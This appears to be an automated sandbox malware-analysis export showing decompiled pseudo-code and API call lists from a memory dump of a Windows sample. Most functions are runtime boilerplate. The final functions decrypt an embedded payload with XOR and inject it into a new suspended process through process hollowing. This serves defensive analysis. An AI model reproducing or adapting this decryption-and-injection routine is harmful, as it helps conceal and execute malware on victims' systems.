    											E00408928( *(_t282 - 0xe) & 0x0000ffff, 4, _t288,  *((intOrPtr*)(_t282 + 8)));
    										} else {
    											E00408928(( *(_t282 - 0xe) & 0x0000ffff) % 0x64, 2, _t288,  *((intOrPtr*)(_t282 + 8)));
    										}
    										goto L109;
    									case 2:
    										L15:
    										E00408974(__ebp) = E004089A0(__ebp);
    										__eax =  *(__ebp + 8);
    										__edx = __ebp - 0x24;
    										 *(__ebp - 0xc) = E00408A18( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
    										__eax =  *(__ebp - 0x24);
    										__eax = E00408908( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
    										goto L109;
    									case 3:
    										L16:
    										E00408974(__ebp) = E004089A0(__ebp);
    										__eax =  *(__ebp + 8);
    										__edx = __ebp - 0x28;
    										 *(__ebp - 0xc) = E00408B80( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
    										__eax =  *(__ebp - 0x28);
    										__eax = E00408908( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
    										goto L109;
    									case 4:
    										L17:
    										E00408974(__ebp) = E004089A0(__ebp);
    										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										if(__eflags < 0) {
    											__eax =  *(__ebp + 8);
    											__eax =  *(__ebp - 0x10) & 0x0000ffff;
    											__edx =  *(__ebp - 0xc);
    											__eax = E00408928( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										} else {
    											if(__eflags == 0) {
    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
    												__eax = 0x45469c[ *(__ebp - 0x10) & 0x0000ffff];
    												__eax = E00408908(0x45469c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
    											} else {
    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
    												__eax =  *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
    												__eax = E00408908( *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    											}
    										}
    										goto L109;
    									case 5:
    										L23:
    										E00408974(__ebp) =  *(__ebp - 0xc);
    										__eax =  *(__ebp - 0xc) - 1;
    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										__eflags = __eax;
    										if(__eflags < 0) {
    											E004089A0(__ebp) =  *(__ebp + 8);
    											__eax =  *(__ebp - 0x12) & 0x0000ffff;
    											__edx =  *(__ebp - 0xc);
    											__eax = E00408928( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										} else {
    											if(__eflags == 0) {
    												E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
    												__eax =  *(0x4546fc + (__ax & 0x0000ffff) * 4);
    												__eax = E00408908( *(0x4546fc + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    											} else {
    												__eax = __eax - 1;
    												__eflags = __eax;
    												if(__eflags == 0) {
    													E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
    													__eax =  *(0x454718 + (__ax & 0x0000ffff) * 4);
    													__eax = E00408908( *(0x454718 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    												} else {
    													__eax = __eax - 1;
    													__eflags = __eax;
    													if(__eax == 0) {
    														__eax =  *(__ebp + 8);
    														__eax =  *0x454684; // 0x0
    														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    													} else {
    														__eax =  *(__ebp + 8);
    														__eax =  *0x454688; // 0x0
    														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    													}
    												}
    											}
    										}
    										goto L109;
    									case 6:
    										L33:
    										__eax = E00408974(__ebp);
    										__eax = E004089D8(__ebp);
    										 *(__ebp - 0x1f) = 0;
    										__esi =  *(__ebp - 4);
    										while(1) {
    											L52:
    											__al =  *__esi;
    											__eflags =  *__esi;
    											if( *__esi == 0) {
    												break;
    											}
    											L34:
    											__eax = __eax & 0x000000ff;
    											__eflags = __eax;
    											asm("bt [0x419108], eax");
    											if(__eax >= 0) {
    												L36:
    												__eax = 0;
    												__al =  *__esi;
    												__eflags = 0 - 0x48;
    												if(0 > 0x48) {
    													L42:
    													__eax = 0xffffffffffffff9f;
    													__eflags = 0xffffffffffffff9f;
    													if(0xffffffffffffff9f == 0) {
    														L45:
    														__eflags =  *(__ebp - 0x1f);
    														if( *(__ebp - 0x1f) != 0) {
    															L51:
    															__esi = __esi + 1;
    															__eflags = __esi;
    															continue;
    														}
    														L46:
    														__edx = 0x409418;
    														__ecx = 5;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 5, 0x409418);
    														__eflags = __eax;
    														if(__eax == 0) {
    															L49:
    															 *((char*)(__ebp - 0x1e)) = 1;
    															break;
    														}
    														L47:
    														__edx = 0x409420;
    														__ecx = 3;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 3, 0x409420);
    														__eflags = __eax;
    														if(__eax == 0) {
    															goto L49;
    														}
    														L48:
    														__edx = 0x409424;
    														__ecx = 4;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 4, 0x409424);
    														__eflags = __eax;
    														if(__eax != 0) {
    															break;
    														}
    														goto L49;
    													}
    													L43:
    													__eax = 0xffffffffffffff98;
    													__eflags = 0xffffffffffffff9f;
    													if(0xffffffffffffff9f == 0) {
    														break;
    													}
    													L44:
    													goto L51;
    												}
    												L37:
    												if(0 == 0x48) {
    													break;
    												}
    												L38:
    												__eax = 0xffffffffffffffde;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													L50:
    													__al =  *(__ebp - 0x1f);
    													__al =  *(__ebp - 0x1f) ^ 0x00000001;
    													__eflags = __al;
    													 *(__ebp - 0x1f) = __al;
    													goto L51;
    												}
    												L39:
    												__eax = 0xffffffffffffffd9;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													goto L50;
    												}
    												L40:
    												__eax = 0xffffffffffffffbf;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													goto L45;
    												}
    												L41:
    												goto L51;
    											} else {
    												__eax = __esi;
    												__eax = E0040B044(__esi);
    												__esi = __eax;
    												continue;
    											}
    										}
    										L53:
    										__ax =  *((intOrPtr*)(__ebp - 0x16));
    										__eflags =  *((char*)(__ebp - 0x1e));
    										if( *((char*)(__ebp - 0x1e)) != 0) {
    											__eflags = __ax;
    											if(__ax != 0) {
    												__eflags = __ax - 0xc;
    												if(__ax > 0xc) {
    													__ax = __ax - 0xc;
    													__eflags = __ax;
    												}
    											} else {
    												__ax = 0xc;
    											}
    										}
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__edx =  *(__ebp + 8);
    										__eax = __ax & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 7:
    										L61:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x18) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 8:
    										L64:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 9:
    										L67:
    										__eax = E00408974(__ebp);
    										__eflags =  *(__ebp - 0xc) - 1;
    										if( *(__ebp - 0xc) != 1) {
    											__eax =  *(__ebp + 8);
    											__eax =  *0x45469c; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										} else {
    											__eax =  *(__ebp + 8);
    											__eax =  *0x454698; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										}
    										goto L109;
    									case 0xa:
    										L70:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 3;
    										if( *(__ebp - 0xc) > 3) {
    											 *(__ebp - 0xc) = 3;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 0xb:
    										goto L0;
    									case 0xc:
    										L90:
    										E00408974(__ebp) =  *(__ebp + 8);
    										__eax =  *0x454684; // 0x0
    										__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										__eax = E004089D8(__ebp);
    										__eflags =  *((short*)(__ebp - 0x16));
    										if( *((short*)(__ebp - 0x16)) != 0) {
    											L93:
    											 *(__ebp + 8) = 0x409438;
    											__edx = 1;
    											E004088C4(1,  *(__ebp + 8)) =  *(__ebp + 8);
    											__eax =  *0x45469c; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    											goto L109;
    										}
    										L91:
    										__eflags =  *(__ebp - 0x18);
    										if( *(__ebp - 0x18) != 0) {
    											goto L93;
    										}
    										L92:
    										__eflags =  *(__ebp - 0x1a);
    										if( *(__ebp - 0x1a) == 0) {
    											goto L109;
    										}
    										goto L93;
    									case 0xd:
    										L94:
    										__eflags =  *0x454681;
    										__eflags = __eax - 0x454681;
    										 *__edi =  *__edi + __cl;
    										__eflags =  *(__ecx - 0x75000000) & __bl;
    									case 0xe:
    										L97:
    										__eflags =  *0x45468c;
    										__eflags = __eax - 0x45468c;
    										_t136 = __edi + __esi * 2 - 0x75;
    										 *_t136 =  *(__edi + __esi * 2 - 0x75) + __dh;
    										__eflags =  *_t136;
    									case 0xf:
    										L100:
    										__esi =  *(__ebp - 4);
    										while(1) {
    											L104:
    											__eax =  *(__ebp - 4);
    											__al =  *__eax;
    											__eflags = __al;
    											if(__al == 0) {
    												break;
    											}
    											L105:
    											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
    											if(__al !=  *((intOrPtr*)(__ebp - 5))) {
    												L101:
    												__eax = __eax & 0x000000ff;
    												__eflags = __eax;
    												asm("bt [0x419108], eax");
    												if(__eax >= 0) {
    													_t146 = __ebp - 4;
    													 *_t146 =  *(__ebp - 4) + 1;
    													__eflags =  *_t146;
    												} else {
    													__eax =  *(__ebp - 4);
    													 *(__ebp - 4) = E0040B044( *(__ebp - 4));
    												}
    												continue;
    											}
    											break;
    										}
    										L106:
    										__eax =  *(__ebp + 8);
    										__edx =  *(__ebp - 4);
    										__edx =  *(__ebp - 4) - __esi;
    										__esi = E004088C4(__edx,  *(__ebp + 8));
    										__eax =  *(__ebp - 4);
    										__eflags =  *__eax;
    										if( *__eax != 0) {
    											 *(__ebp - 4) =  *(__ebp - 4) + 1;
    										}
    										goto L109;
    								}
    							} else {
    								__eflags = _t181 - 0x4d;
    								if(_t181 == 0x4d) {
    									__eflags = _t232 - 0x48;
    									if(_t232 == 0x48) {
    										_t181 = 0x4e;
    									}
    								}
    								L9:
    								_t232 = _t181;
    								goto L10;
    							}
    						} else {
    							E004088C4(E0040B024( *((intOrPtr*)(_t282 - 4))),  *((intOrPtr*)(_t282 + 8)));
    							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
    							_t232 = 0x20;
    							continue;
    						}
    					}
    					L110:
    					 *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) - 1;
    					_pop(_t272);
    					 *[fs:eax] = _t272;
    					_push(E00409410);
    					return E00403EAC(_t282 - 0x28, 2);
    				}
    			}


















    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0040D920(intOrPtr* __eax) {
    				char _v260;
    				char _v768;
    				char _v772;
    				intOrPtr* _v776;
    				signed short* _v780;
    				char _v784;
    				signed int _v788;
    				char _v792;
    				intOrPtr* _v796;
    				signed char _t43;
    				intOrPtr* _t60;
    				void* _t79;
    				void* _t81;
    				void* _t84;
    				void* _t85;
    				intOrPtr* _t92;
    				void* _t96;
    				char* _t97;
    				void* _t98;
    
    				_v776 = __eax;
    				if(( *(_v776 + 1) & 0x00000020) == 0) {
    					E0040D7EC(0x80070057);
    				}
    				_t43 =  *_v776;
    				if((_t43 & 0x00000fff) == 0xc) {
    					if((_t43 & 0x00000040) == 0) {
    						_v780 =  *((intOrPtr*)(_v776 + 8));
    					} else {
    						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
    					}
    					_v788 =  *_v780 & 0x0000ffff;
    					_t79 = _v788 - 1;
    					if(_t79 >= 0) {
    						_t85 = _t79 + 1;
    						_t96 = 0;
    						_t97 =  &_v772;
    						do {
    							_v796 = _t97;
    							_push(_v796 + 4);
    							_t22 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040C9FC();
    							E0040D7EC(_v780);
    							_push( &_v784);
    							_t25 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040CA04();
    							E0040D7EC(_v780);
    							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
    							_t96 = _t96 + 1;
    							_t97 = _t97 + 8;
    							_t85 = _t85 - 1;
    						} while (_t85 != 0);
    					}
    					_t81 = _v788 - 1;
    					if(_t81 >= 0) {
    						_t84 = _t81 + 1;
    						_t60 =  &_v768;
    						_t92 =  &_v260;
    						do {
    							 *_t92 =  *_t60;
    							_t92 = _t92 + 4;
    							_t60 = _t60 + 8;
    							_t84 = _t84 - 1;
    						} while (_t84 != 0);
    						do {
    							goto L12;
    						} while (E0040D8C4(_t83, _t98) != 0);
    						goto L15;
    					}
    					L12:
    					_t83 = _v788 - 1;
    					if(E0040D894(_v788 - 1, _t98) != 0) {
    						_push( &_v792);
    						_push( &_v260);
    						_push(_v780);
    						L0040CA0C();
    						E0040D7EC(_v780);
    						E0040DB18(_v792);
    					}
    				}
    				L15:
    				_push(_v776);
    				L0040C598();
    				return E0040D7EC(_v776);
    			}























    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040D9CF
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040D9EB
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DA62
    • VariantClear.OLEAUT32(?), ref: 0040DA8B
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040B3A0() {
    				char _v152;
    				short _v410;
    				signed short _t14;
    				signed int _t16;
    				int _t18;
    				void* _t20;
    				void* _t23;
    				int _t24;
    				int _t26;
    				signed int _t30;
    				signed int _t31;
    				signed int _t32;
    				signed int _t37;
    				int* _t39;
    				short* _t41;
    				void* _t49;
    
    				 *0x454738 = 0x409;
    				 *0x45473c = 9;
    				 *0x454740 = 1;
    				_t14 = GetThreadLocale();
    				if(_t14 != 0) {
    					 *0x454738 = _t14;
    				}
    				if(_t14 != 0) {
    					 *0x45473c = _t14 & 0x3ff;
    					 *0x454740 = (_t14 & 0x0000ffff) >> 0xa;
    				}
    				memcpy(0x419108, 0x40b4f4, 8 << 2);
    				if( *0x4190c0 != 2) {
    					_t16 = GetSystemMetrics(0x4a);
    					__eflags = _t16;
    					 *0x454745 = _t16 & 0xffffff00 | _t16 != 0x00000000;
    					_t18 = GetSystemMetrics(0x2a);
    					__eflags = _t18;
    					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
    					 *0x454744 = _t31;
    					__eflags = _t31;
    					if(__eflags != 0) {
    						return E0040B328(__eflags, _t49);
    					}
    				} else {
    					_t20 = E0040B388();
    					if(_t20 != 0) {
    						 *0x454745 = 0;
    						 *0x454744 = 0;
    						return _t20;
    					}
    					E0040B328(__eflags, _t49);
    					_t37 = 0x20;
    					_t23 = E00402C54(0x419108, 0x20, 0x40b4f4);
    					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
    					 *0x454744 = _t32;
    					__eflags = _t32;
    					if(_t32 != 0) {
    						 *0x454745 = 0;
    						return _t23;
    					}
    					_t24 = 0x80;
    					_t39 =  &_v152;
    					do {
    						 *_t39 = _t24;
    						_t24 = _t24 + 1;
    						_t39 =  &(_t39[0]);
    						__eflags = _t24 - 0x100;
    					} while (_t24 != 0x100);
    					_t26 =  *0x454738; // 0x409
    					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
    					_t18 = 0x80;
    					_t41 =  &_v410;
    					while(1) {
    						__eflags =  *_t41 - 2;
    						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
    						 *0x454745 = _t37;
    						__eflags = _t37;
    						if(_t37 != 0) {
    							goto L17;
    						}
    						_t41 = _t41 + 2;
    						_t18 = _t18 - 1;
    						__eflags = _t18;
    						if(_t18 != 0) {
    							continue;
    						} else {
    							return _t18;
    						}
    						L18:
    					}
    				}
    				L17:
    				return _t18;
    				goto L18;
    			}




















    APIs
    • GetThreadLocale.KERNEL32 ref: 0040B3CA
    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
    • GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
    • GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 0040B328: GetCPInfo.KERNEL32(00000000,?), ref: 0040B341
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040152C(void* __eax, void** __ecx, void* __edx) {
    				void* _t4;
    				void** _t9;
    				void* _t13;
    				void* _t14;
    				long _t16;
    				void* _t17;
    
    				_t9 = __ecx;
    				_t14 = __edx;
    				_t17 = __eax;
    				 *(__ecx + 4) = 0x100000;
    				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
    				_t13 = _t4;
    				 *_t9 = _t13;
    				if(_t13 == 0) {
    					_t16 = _t14 + 0x0000ffff & 0xffff0000;
    					_t9[1] = _t16;
    					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
    					 *_t9 = _t4;
    				}
    				if( *_t9 != 0) {
    					_t4 = E0040137C(0x4545e4, _t9);
    					if(_t4 == 0) {
    						VirtualFree( *_t9, 0, 0x8000);
    						 *_t9 = 0;
    						return 0;
    					}
    				}
    				return _t4;
    			}










    APIs
    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040154A
    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040156F
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 00401595
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405E00(void* __eax, int __ecx, long __edx) {
    				void* _t2;
    				void* _t4;
    
    				_t2 = GlobalHandle(__eax);
    				GlobalUnWire(_t2);
    				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
    				GlobalFix(_t4);
    				return _t4;
    			}






    APIs
    • GlobalHandle.KERNEL32 ref: 00405E03
    • GlobalUnWire.KERNEL32(00000000), ref: 00405E0A
    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00405E0F
    • GlobalFix.KERNEL32(00000000), ref: 00405E15
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00408B80(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
    				char _v8;
    				short _v18;
    				short _v22;
    				struct _SYSTEMTIME _v24;
    				char _v280;
    				char* _t32;
    				intOrPtr* _t49;
    				intOrPtr _t58;
    				void* _t63;
    				void* _t67;
    
    				_v8 = 0;
    				_t49 = __edx;
    				_t63 = __eax;
    				_push(_t67);
    				_push(0x408c5e);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t67 + 0xfffffeec;
    				E00403E88(__edx);
    				_v24 =  *((intOrPtr*)(_a4 - 0xe));
    				_v22 =  *((intOrPtr*)(_a4 - 0x10));
    				_v18 =  *((intOrPtr*)(_a4 - 0x12));
    				if(_t63 > 2) {
    					E00403F20( &_v8, 0x408c80);
    				} else {
    					E00403F20( &_v8, 0x408c74);
    				}
    				_t32 = E00404348(_v8);
    				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
    					E004040F8(_t49, 0x100,  &_v280);
    					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
    						E004043A8( *_t49, E00404148( *_t49) - 1, 2, _t49);
    					}
    				}
    				_pop(_t58);
    				 *[fs:eax] = _t58;
    				_push(E00408C65);
    				return E00403E88( &_v8);
    			}














    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00408C5E), ref: 00408C06
    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 00408C0C
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 50%
    			E0041844E() {
    				struct _SYSTEM_INFO _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr* _t15;
    				void* _t31;
    				signed int _t34;
    				void* _t38;
    				void* _t39;
    				void* _t45;
    				void* _t51;
    
    				_v44 = 0;
    				_v52 = 0;
    				_v48 = 0;
    				_push(_t45);
    				_push(0x418517);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t45 + 0xffffffd0;
    				GetSystemInfo( &_v40);
    				_t34 = 0;
    				_t31 = 0x39a91;
    				_t15 = 0x41944c;
    				do {
    					if(_t34 == 0x20) {
    						_t34 = 0;
    					}
    					_t5 = (_t34 & 0x000000ff) + 0x452ee0; // 0x8845645c
    					_t30 = ( *_t15 - _t34 ^  *_t5) + _t34;
    					 *_t15 = ( *_t15 - _t34 ^  *_t5) + _t34;
    					_t34 = _t34 + 1;
    					_t15 = _t15 + 1;
    					_t31 = _t31 - 1;
    				} while (_t31 != 0);
    				L5:
    				_push("h`JE");
    				_push("-t ");
    				_push(0);
    				E004070E8( &_v48, _t51, _v40.dwNumberOfProcessors >> 1);
    				_push(_v48);
    				_push(0x41853c);
    				_push( *0x454a5c);
    				E00404208();
    				_push(_v44);
    				E004029A4(0,  &_v52);
    				_pop(_t38);
    				E00417F5C(_v52, _t30, 0x41944c, _t38, _t39, _t42, _t51);
    				goto L5;
    			}















    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 53%
    			E00418450() {
    				struct _SYSTEM_INFO _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr* _t15;
    				void* _t30;
    				signed int _t33;
    				void* _t37;
    				void* _t38;
    				intOrPtr _t42;
    				void* _t47;
    
    				_v44 = 0;
    				_v52 = 0;
    				_v48 = 0;
    				_push(0x418517);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t42;
    				GetSystemInfo( &_v40);
    				_t33 = 0;
    				_t30 = 0x39a91;
    				_t15 = 0x41944c;
    				do {
    					if(_t33 == 0x20) {
    						_t33 = 0;
    					}
    					_t5 = (_t33 & 0x000000ff) + 0x452ee0; // 0x8845645c
    					_t29 = ( *_t15 - _t33 ^  *_t5) + _t33;
    					 *_t15 = ( *_t15 - _t33 ^  *_t5) + _t33;
    					_t33 = _t33 + 1;
    					_t15 = _t15 + 1;
    					_t30 = _t30 - 1;
    				} while (_t30 != 0);
    				L4:
    				_push("h`JE");
    				_push("-t ");
    				_push(0);
    				E004070E8( &_v48, _t47, _v40.dwNumberOfProcessors >> 1);
    				_push(_v48);
    				_push(0x41853c);
    				_push( *0x454a5c);
    				E00404208();
    				_push(_v44);
    				E004029A4(0,  &_v52);
    				_pop(_t37);
    				E00417F5C(_v52, _t29, 0x41944c, _t37, _t38, _t40, _t47);
    				goto L4;
    			}

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
